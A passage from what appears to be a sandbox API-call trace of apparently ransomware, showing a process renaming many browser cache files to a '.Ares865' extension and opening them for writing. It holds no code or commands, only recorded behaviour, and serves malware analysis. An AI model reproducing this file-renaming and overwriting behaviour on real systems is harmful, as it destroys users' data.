Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42838) returned 1 [0095.192] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js.Ares865") returned 119 [0095.192] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js.ares865"), dwFlags=0x1) returned 1 [0095.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.193] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=287230) returned 1 [0095.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png.Ares865") returned 117 [0095.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png.ares865"), dwFlags=0x1) returned 1 [0095.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=333) returned 1 [0095.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png.Ares865") returned 117 [0095.214] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png.ares865"), dwFlags=0x1) returned 1 [0095.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=407) returned 1 [0095.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png.Ares865") returned 117 [0095.219] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png.ares865"), dwFlags=0x1) returned 1 [0095.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.220] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=706) returned 1 [0095.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png.Ares865") returned 117 [0095.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png.ares865"), dwFlags=0x1) returned 1 [0095.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=706) returned 1 [0095.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png.Ares865") returned 117 [0095.227] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png.ares865"), dwFlags=0x1) returned 1 [0095.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516) returned 1 [0095.231] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png.Ares865") returned 117 [0095.231] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png.ares865"), dwFlags=0x1) returned 1 [0095.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.233] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=749) returned 1 [0095.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png.Ares865") returned 117 [0095.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png.ares865"), dwFlags=0x1) returned 1 [0095.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=764) returned 1 [0095.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg.Ares865") returned 117 [0095.240] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13323) returned 1 [0095.244] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg.Ares865") returned 117 [0095.244] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.246] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6564) returned 1 [0095.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png.Ares865") returned 117 [0095.249] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png.ares865"), dwFlags=0x1) returned 1 [0095.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.251] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=860) returned 1 [0095.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg.Ares865") returned 117 [0095.253] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10126) returned 1 [0095.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png.Ares865") returned 117 [0095.258] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png.ares865"), dwFlags=0x1) returned 1 [0095.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.259] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=410) returned 1 [0095.262] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png.Ares865") returned 117 [0095.262] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png.ares865"), dwFlags=0x1) returned 1 [0095.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.264] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0095.267] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865") returned 180 [0095.267] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.ares865"), dwFlags=0x1) returned 1 [0095.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1616) returned 1 [0095.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1].Ares865") returned 115 [0095.271] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1].ares865"), dwFlags=0x1) returned 1 [0095.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.273] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10352) returned 1 [0095.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1].Ares865") returned 114 [0095.276] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1].ares865"), dwFlags=0x1) returned 1 [0095.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.277] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3871) returned 1 [0095.280] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js.Ares865") returned 112 [0095.280] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet 